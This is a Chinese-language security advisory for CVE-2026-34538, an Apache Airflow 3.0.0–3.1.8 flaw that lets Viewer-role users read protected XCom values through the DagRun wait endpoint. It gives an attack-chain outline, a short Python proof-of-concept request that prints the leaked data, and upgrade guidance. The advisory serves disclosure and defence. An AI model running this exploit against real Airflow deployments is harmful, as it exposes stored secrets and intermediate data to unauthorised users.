CVE-2026-34538 CVSS 6.5 中危

CVE-2026-34538 Apache Airflow 权限绕过漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34538

漏洞类型

权限绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Apache Airflow

漏洞概述

Apache Airflow 3.0.0至3.1.8版本存在权限绕过漏洞。由于DagRun wait端点的访问控制缺陷，仅拥有DAG Run读取权限（如Viewer角色）的用户可以获取本应受保护的XCom结果值。该行为违反了FAB RBAC模型及安全文档定义，导致敏感执行结果泄露。建议升级至3.2.0版本修复。

技术细节

该漏洞源于Apache Airflow在处理DagRun wait端点的请求时，权限校验逻辑存在缺陷。Airflow采用FAB（Flask-AppBuilder）Auth Manager进行基于资源的访问控制，其安全模型明确规定XCom（跨任务通信数据）是独立受保护的资源，Viewer角色仅能检查DAG定义而无法访问敏感执行结果。然而，在受影响版本中，wait端点仅验证了用户对DAG Run的读取权限，未对XCom数据的访问进行二次鉴权。攻击者利用拥有Viewer权限的低权账户，向该端点发送请求，即可绕过RBAC限制，获取包含敏感信息（如密钥、中间数据）的XCom返回值，导致严重的信息泄露风险。

攻击链分析

STEP 1

侦察

确定目标运行的Apache Airflow版本在3.0.0至3.1.8之间。

STEP 2

获取凭证

获取一个具有Viewer角色或DAG Run读取权限的低权限账户凭据。

STEP 3

发送请求

使用低权限账户向DagRun wait端点发送API请求，触发漏洞。

STEP 4

数据窃取

解析服务器响应，提取其中包含的敏感XCom结果值。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for the vulnerable endpoint
# Replace {dag_id} and {dag_run_id} with actual values
target_url = "http://target-airflow-host/api/v1/dags/{dag_id}/dagRuns/{dag_run_id}/wait"

# Credentials for a low-privileged user (e.g., Viewer role)
auth = ('low_priv_user', 'password')

try:
    # Send request to the wait endpoint
    # Vulnerability: This endpoint returns XCom values without checking XCom access rights
    response = requests.get(target_url, auth=auth, timeout=10)
    
    if response.status_code == 200:
        print("[+] Exploit Successful! Leaked XCom Data:")
        print(response.json())
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

Apache Airflow 3.0.0 - 3.1.8

防御指南

临时缓解措施

建议立即升级至Apache Airflow 3.2.0或更高版本。如果暂时无法升级，应严格限制网络访问，仅允许可信IP访问Airflow Web界面，并审查所有用户权限，移除非必要的Viewer账户，以降低数据泄露风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表